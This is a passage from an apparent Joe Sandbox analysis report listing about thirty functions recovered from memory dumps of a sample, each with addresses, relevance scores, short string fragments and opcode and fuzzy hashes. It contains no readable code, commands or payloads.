                  Function 00007FFD9BAC88E8 Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_^1$L_^9$L_^M
                  • API String ID: 0-2753354998
                  • Opcode ID: f04db21d929c684b89ccdb156d9ebb8db0237426e94daab74db5655e489a2dfa
                  • Instruction ID: 3705188e83d533116da262b04084848f06d7e5bbc683451f711d69d342322187
                  • Opcode Fuzzy Hash: f04db21d929c684b89ccdb156d9ebb8db0237426e94daab74db5655e489a2dfa
                  • Instruction Fuzzy Hash: 58214C23B0D5090AD728BBACAC655FD3750FF5533AB000177E61A87093EE242546C691
                  Function 00007FFD9BAC8908 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: L_^9$L_^M
                  • API String ID: 0-2885716835
                  • Opcode ID: 1acc9fca70ad736c412dfd1cc399cefea78ba74670ec7e76393994359979a36f
                  • Instruction ID: 79005558f09deff9511d723b123d155f546b4d3d5b173425ffa6d04326ca4658
                  • Opcode Fuzzy Hash: 1acc9fca70ad736c412dfd1cc399cefea78ba74670ec7e76393994359979a36f
                  • Instruction Fuzzy Hash: 11113B23B0E60E0AD728BBA8AC651FC7750FF55239F001277E65E8B093EE642645C682
                  Function 00007FFD9BAC12DD Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: %$.
                  • API String ID: 0-3975786864
                  • Opcode ID: ca6410c8b38c2b72ec683825ebf277003bd60597ed8f6b394294d02bb52e35cd
                  • Instruction ID: 50c407f3e648f1e47e5a51152b63f0eb205cc9440ae9a730eee6742e14e84f10
                  • Opcode Fuzzy Hash: ca6410c8b38c2b72ec683825ebf277003bd60597ed8f6b394294d02bb52e35cd
                  • Instruction Fuzzy Hash: 8111B770E0966E8BDBA8DF94D8A47FDB6B1BF54300F0141AED41EA7291CB756A80CF04
                  Function 00007FFD9BABD4B9 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: OM_H
                  • API String ID: 0-3746890205
                  • Opcode ID: aec7b2e07c453ff546c4c5e7fbf6b1da8e8bf7818c278ae75e3e49498f313474
                  • Instruction ID: 0037dc817ec73e7ed45e2e0b4372e7b72fc8db5fde86ecd285a8a4c9b4250d2c
                  • Opcode Fuzzy Hash: aec7b2e07c453ff546c4c5e7fbf6b1da8e8bf7818c278ae75e3e49498f313474
                  • Instruction Fuzzy Hash: F6E15C71E19A5D8FEB68DB98C8A4BA8B7A1FF58304F4441BDD05DD72A2CE746940CF01
                  Function 00007FFD9BAB0D66 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: 98ae475aa5be701870400430f4458c0e5cbfb9938b41953a419f68fe76558bca
                  • Instruction ID: 95121c927d7f53359e75608b771cec395625ab6e3b91526e5c2f4ffad9c0e7e0
                  • Opcode Fuzzy Hash: 98ae475aa5be701870400430f4458c0e5cbfb9938b41953a419f68fe76558bca
                  • Instruction Fuzzy Hash: 2071E331F09A1D4FEBA8DB68C865BEDB3A1EF54310F0142B9D01DD71A6DE74AA498F40
                  Function 00007FFD9BABC3FA Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: ^
                  • API String ID: 0-1590793086
                  • Opcode ID: ba3fcc4ab2da904b71b5c8207322f983793ba687d5864b122d9d349813816993
                  • Instruction ID: 94dfb336b8792fe5649abde1100a3dcfbf9ce0928d9fc6a42a7e56013be952eb
                  • Opcode Fuzzy Hash: ba3fcc4ab2da904b71b5c8207322f983793ba687d5864b122d9d349813816993
                  • Instruction Fuzzy Hash: 11412C3260D65D4AE729BBECE8289F93790EF1533AF0502B7D46DCA0D3ED6861448B51
                  Function 00007FFD9BAC36FA Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: M_^
                  • API String ID: 0-446440506
                  • Opcode ID: 48fb155c6e49a0c3a0da23ed385d65c027d84cc641f511240353a046f760b096
                  • Instruction ID: aed40b69dae225076c176c190af105ab533330910cddad7595f246780389436b
                  • Opcode Fuzzy Hash: 48fb155c6e49a0c3a0da23ed385d65c027d84cc641f511240353a046f760b096
                  • Instruction Fuzzy Hash: 40413372A0D6494EE712FBACAC6A5F97BE0EF16329B0602F7D458CB0A3ED346144C351
                  Function 00007FFD9BAC603D Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID: "
                  • API String ID: 0-123907689
                  • Opcode ID: b5d2dbc2edb14cfc7b4f02c5eea060cc61c90053f2d89d2e6e53c84b22cfd79b
                  • Instruction ID: 66b343875b26494698e17cbf7c46870e92a343a859bfb6315fb42f385fe05d66
                  • Opcode Fuzzy Hash: b5d2dbc2edb14cfc7b4f02c5eea060cc61c90053f2d89d2e6e53c84b22cfd79b
                  • Instruction Fuzzy Hash: 4A41D970D0956E8FEBB4EB98C8547ACB7B1FB54311F5141AAD00EA7291DB782A858F00
                  Function 00007FFD9BACA963 Relevance: .5, Instructions: 459COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 83c2593c1f02bb42da7153aed7641df31e58648b8dcf8ec89e07ed173787e62c
                  • Instruction ID: 344995bc30eb330c1837231dedf9361aad56410d620e69effdb19cedaee98d1c
                  • Opcode Fuzzy Hash: 83c2593c1f02bb42da7153aed7641df31e58648b8dcf8ec89e07ed173787e62c
                  • Instruction Fuzzy Hash: B3F16D71E0991D8FEBA9EB68C865BF8B3A1FF58300F1005B9D01DD71A6DE746A81CB40
                  Function 00007FFD9BAC3835 Relevance: .3, Instructions: 334COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35b9534e37a4ace0f95d630aa8297ecffd993206e31fdc97c2a23a03d9a3bcd8
                  • Instruction ID: aa3efd4ddf0b65f2c21f4494307bfe333f6628d53135c10a87091d8f8162dbfc
                  • Opcode Fuzzy Hash: 35b9534e37a4ace0f95d630aa8297ecffd993206e31fdc97c2a23a03d9a3bcd8
                  • Instruction Fuzzy Hash: B0D1A670E19A1D9EDBA4EB98C8657FCB6F1EF58301F5141BAD00DE3292DE746A858F00
                  Function 00007FFD9BACD2A1 Relevance: .3, Instructions: 316COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7c47425b4ff8ee326f62a355c70ee0f887b9a2b099356796fb8a11a3e4fa8be6
                  • Instruction ID: 5dff6b22b6e734e9b6b1228f2d5b9d29211ba0e6c4ff610b834f9b1a3c5b986a
                  • Opcode Fuzzy Hash: 7c47425b4ff8ee326f62a355c70ee0f887b9a2b099356796fb8a11a3e4fa8be6
                  • Instruction Fuzzy Hash: E9D19870E1952D8EEBA4EB54C8A9BF8B7B1FF58311F5001E5940DE32A2CE746A81CF41
                  Function 00007FFD9BAB05A0 Relevance: .3, Instructions: 313COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction ID: 15239c11f37e7583b54517ae62b43cae25425d98d81673804ad9e4ecb8a0f75d
                  • Opcode Fuzzy Hash: 470ae8d0a3dfbd4c61bec70e886c42d6164606fea376d6aff36063b862b88735
                  • Instruction Fuzzy Hash: 63913703B0F6E50BE33163ED2C751E96F50DF51769B0D42F7E0A88A0E7EC5866468785
                  Function 00007FFD9BAB060D Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction ID: 9cbc23ae92ba34ae3cedc5a3e7836bd34ad55450a3a53deb9423a9b9f6b947cd
                  • Opcode Fuzzy Hash: f00dc2620e14f9ae27ba380080fd9ac9ea6ef14d12505ceedbfff7fbdbe20bd0
                  • Instruction Fuzzy Hash: 5A814843B0F6E50BE33163ED2C751E96F90DF51769B0942FBE0A88A0E7EC586646C784
                  Function 00007FFD9BAB0638 Relevance: .3, Instructions: 289COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction ID: e3549060fbc56a5a4b53d1cf68d266b33ac9b9b4d6eadc19f7f6dc09d3fc99b3
                  • Opcode Fuzzy Hash: b0893f01b0d172efb5aef016c6ed87ae6e6406e2315cd03ccbe254977a235d3e
                  • Instruction Fuzzy Hash: 4C816853B0FAD50BE33067EC6C651E97F90EF51365B0942FBE0A8CA0E7EC54A6468784
                  Function 00007FFD9BAB0640 Relevance: .3, Instructions: 267COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction ID: 4947398d53e5c884a2d0fa4debc842be9b041fbdd788ba6d996f4eba676cd1e7
                  • Opcode Fuzzy Hash: c206fc7975da7790fd2efb7691bbc2ae4601ed903c2c136df3272f70e9eba674
                  • Instruction Fuzzy Hash: E7715843B0F6D50BE33163EC2C751E96F90EF51765B0942FBE0A8890E7EC5466468784
                  Function 00007FFD9BAC2581 Relevance: .3, Instructions: 252COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c08a440735fa7b59170f02a314f59b83e878841c15ba89eb24e7a7a649d0f7ca
                  • Instruction ID: aacabb1b804aaba1b547067693006693fd14466a14e39f0be9cb8438495a2bde
                  • Opcode Fuzzy Hash: c08a440735fa7b59170f02a314f59b83e878841c15ba89eb24e7a7a649d0f7ca
                  • Instruction Fuzzy Hash: 94A1D770E0961D8EDBA4EB98C865BEDB7B1FF58300F1141A9D01DE72A5DE786A84CF40
                  Function 00007FFD9BAB1DC2 Relevance: .2, Instructions: 217COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction ID: 1c108e673fdb4558083ef58de195676daf57c374a9b3a6eca3b81835e913364a
                  • Opcode Fuzzy Hash: 1bc581bb9074776bfe1225467685a1d815152cfe78b38a904487d3ac6acf100e
                  • Instruction Fuzzy Hash: 5B61B031B2CA594BDB58DF5C88A15B977E2FFE8304B15416EE45EC3296DE30A902CB81
                  Function 00007FFD9BACF919 Relevance: .2, Instructions: 202COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c43009be88f911af6be18e93ff5c524aad7e6b959d291da9cacfea538db1129d
                  • Instruction ID: 112d7fd6d1b33fc467f6cfefb6505754359584e0cea2fb66ea3ae54f2a560238
                  • Opcode Fuzzy Hash: c43009be88f911af6be18e93ff5c524aad7e6b959d291da9cacfea538db1129d
                  • Instruction Fuzzy Hash: 10611970E0951D8FEBA4EBA8C8656BDB7B1FF58300F11017AD40DE32A6DBB969458B40
                  Function 00007FFD9BACBFA1 Relevance: .2, Instructions: 197COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 23d5f259662352e9bcffe88ec240da5eac92f43cef8fb1c159c01f4c36ad8385
                  • Instruction ID: 50629e6befc3f388f7d84027dd05b3748c2d4b44d8164b8ca12dff737d8cd105
                  • Opcode Fuzzy Hash: 23d5f259662352e9bcffe88ec240da5eac92f43cef8fb1c159c01f4c36ad8385
                  • Instruction Fuzzy Hash: 76814870E1861D8BEB54EB98C865BBDB7B2FF58305F0141B9E01DA7296CF786940CB41
                  Function 00007FFD9BABA928 Relevance: .2, Instructions: 191COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62d971c92204fa8f5a667bded0ad6bc31cfee38452f911e4080cc748685d55e2
                  • Instruction ID: 3d4ea66fd5384614b5b2b92f034047d092ca6642f8c268f29cf91847b6c658d2
                  • Opcode Fuzzy Hash: 62d971c92204fa8f5a667bded0ad6bc31cfee38452f911e4080cc748685d55e2
                  • Instruction Fuzzy Hash: 9E610970E0992D8EEBA4EBA8C4656EDB7B1FF59300F914179D01DE32A1DE7869418F40
                  Function 00007FFD9BACC73B Relevance: .2, Instructions: 168COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 14e8c8f1c08de8c74010407a05a790bd9c4594cbfd737d49170e00bda8213fe5
                  • Instruction ID: cb5ec3069326b7463ecb7fa0a2f384afebf87af993ec842207b30eebc8f6bf5e
                  • Opcode Fuzzy Hash: 14e8c8f1c08de8c74010407a05a790bd9c4594cbfd737d49170e00bda8213fe5
                  • Instruction Fuzzy Hash: 0461B470E1561D8FEB64EFA8C8A5BEDBBB1FF58304F104169D009E7292DB786981CB41
                  Function 00007FFD9BABBBE9 Relevance: .2, Instructions: 163COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8fff5eb0be4a1b1ed4ef015a0a87e1443b14b2b7e3851bf1828b5b0527b16c2d
                  • Instruction ID: 4fd4ba529ef9117eb1925afe253327fd4f46404caad8c58b29be3036da072c8a
                  • Opcode Fuzzy Hash: 8fff5eb0be4a1b1ed4ef015a0a87e1443b14b2b7e3851bf1828b5b0527b16c2d
                  • Instruction Fuzzy Hash: D9510D70E1952D8FEBA4EBA884657ECB7B0FF59300F81017AD01DE32A2DE7869418F40
                  Function 00007FFD9BAB2265 Relevance: .2, Instructions: 154COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a90bf008e6a223ed769c1d6b027d5d61eee0ab726c029517b80552631834a807
                  • Instruction ID: a8607933b4d9bf9232a75c5ffee0724d27b3badab32d0295f6faeec09b25cb89
                  • Opcode Fuzzy Hash: a90bf008e6a223ed769c1d6b027d5d61eee0ab726c029517b80552631834a807
                  • Instruction Fuzzy Hash: BF51A435E0E76E8FEB75DB90D8217A8BBA0EF55300F0101BAD02D961A2DFB86644CF41
                  Function 00007FFD9BAB31B1 Relevance: .1, Instructions: 145COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf08183c894bfd59fd5946585dd67df04cdea55456ccf48a9de6a583ba83ba80
                  • Instruction ID: bac51e9ffd2fd4ca1199fa0160d567c812503d6118f1df853ef3d4d8673c9023
                  • Opcode Fuzzy Hash: bf08183c894bfd59fd5946585dd67df04cdea55456ccf48a9de6a583ba83ba80
                  • Instruction Fuzzy Hash: 13512B31E0A62D8FEB64EB98C4646EDBBF1FF59300F41417AD419E71A1DA786A44CF00
                  Function 00007FFD9BAB2135 Relevance: .1, Instructions: 141COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bab0000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1cc97f4090bb76d1cc3147de06a77964ad9e1696902c08674dddf7f114486777
                  • Instruction ID: b9acead8e9a67258a8fba66d1fe6ef1920006d51d743e349c7067531bb8de708
                  • Opcode Fuzzy Hash: 1cc97f4090bb76d1cc3147de06a77964ad9e1696902c08674dddf7f114486777
                  • Instruction Fuzzy Hash: 19419C31B0E75E0FD365DBB8A8651B87BD0EF86300F0505BBD41CC71B2DE28A9418741
                  Function 00007FFD9BAC79F1 Relevance: .1, Instructions: 134COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b15ed8ab5e84596169225b7d2c1c1b5f335ae55b3c2ada72c93e123a20e24720
                  • Instruction ID: f6135db46d0ccf21c11e2d7886d26376ef392efe9f58b32fb09b9ed165be4ebb
                  • Opcode Fuzzy Hash: b15ed8ab5e84596169225b7d2c1c1b5f335ae55b3c2ada72c93e123a20e24720
                  • Instruction Fuzzy Hash: 21418D30A0AA0E8FEB65EF98C8657B977A1FF58300F0141B9D00DD71A5DE78AA418B81
                  Function 00007FFD9BAC8D4A Relevance: .1, Instructions: 134COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d087c09000d1465bbb25ebfa68844aae3266e76bdb7b81295bb9564619dc47f3
                  • Instruction ID: 5b9ff2bbee86cfc5ad4f308f3cb2378674790c6473df6087844d8b6f387dbd53
                  • Opcode Fuzzy Hash: d087c09000d1465bbb25ebfa68844aae3266e76bdb7b81295bb9564619dc47f3
                  • Instruction Fuzzy Hash: A841F861E0E99E5FF766A76848391B97BE0FF31320B0941B6D458870F3DF64A914C352
                  Function 00007FFD9BAC23AD Relevance: .1, Instructions: 122COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee81fbd0d8b7d1f893dcc9923c2dc3e96be0604a115a45d2b0da566cef4eadd9
                  • Instruction ID: 61add30a1cf9d8ee98637006cbe2e373178ff984aff1188ecadaca1412eb2aa0
                  • Opcode Fuzzy Hash: ee81fbd0d8b7d1f893dcc9923c2dc3e96be0604a115a45d2b0da566cef4eadd9
                  • Instruction Fuzzy Hash: A8417C30E19A1D8FDB54EBE8D865AEDBBB1FF58305F01017AE019E72A6CB746940CB40
                  Function 00007FFD9BABBD0C Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BABA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABA000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9baba000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6690613db6a5edcd1b591d758a5c9f959a07aa2f73fc6dc2c8bf5ec4dd4fcf7d
                  • Instruction ID: 158045e1a2a67e06f7d871c5a9261a5be054ce93a2ae969a59883450917f9ab5
                  • Opcode Fuzzy Hash: 6690613db6a5edcd1b591d758a5c9f959a07aa2f73fc6dc2c8bf5ec4dd4fcf7d
                  • Instruction Fuzzy Hash: 6B31EB75E1992D8FEBA4EBA8C465ABCB7B1FF59300F910079D01DD32A2DE7469418F40
                  Function 00007FFD9BAC6C89 Relevance: .1, Instructions: 113COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9268891df87aa5d1aa66be8ecbaa41bb1d8f433157db6098f8f844300e5d3106
                  • Instruction ID: ef117320e544980fa70cf838fc8682c6bb1f24eab16354d005b7acb589faea94
                  • Opcode Fuzzy Hash: 9268891df87aa5d1aa66be8ecbaa41bb1d8f433157db6098f8f844300e5d3106
                  • Instruction Fuzzy Hash: 1341D130A0DA1E8FEB65EB98C8646FD77E1FF68310F01417AD409D71A6CFB8A9448B41
                  Function 00007FFD9BACABBB Relevance: .1, Instructions: 105COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cf17566945340740ce4b2e98669b7c3465e465e9fd4a979276a1366d4b66b367
                  • Instruction ID: 2396bd9ff62665bf2446d3a1f70f4c1db971043246c1b91c9b5b3cb62b61b718
                  • Opcode Fuzzy Hash: cf17566945340740ce4b2e98669b7c3465e465e9fd4a979276a1366d4b66b367
                  • Instruction Fuzzy Hash: C241F870E09A2D8FDBA9EF58C455AE8B3B1FF58301F5001B9D01DE7296CA74AA81CF40
                  Function 00007FFD9BAC5020 Relevance: .1, Instructions: 101COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000023.00000002.1789265133.00007FFD9BAC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_35_2_7ffd9bac1000_UAhpvIJrmb.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dbf534498cdbe58acedd0206a1e8da89f91efc56aa4d5f0aa8c083023d1857b2
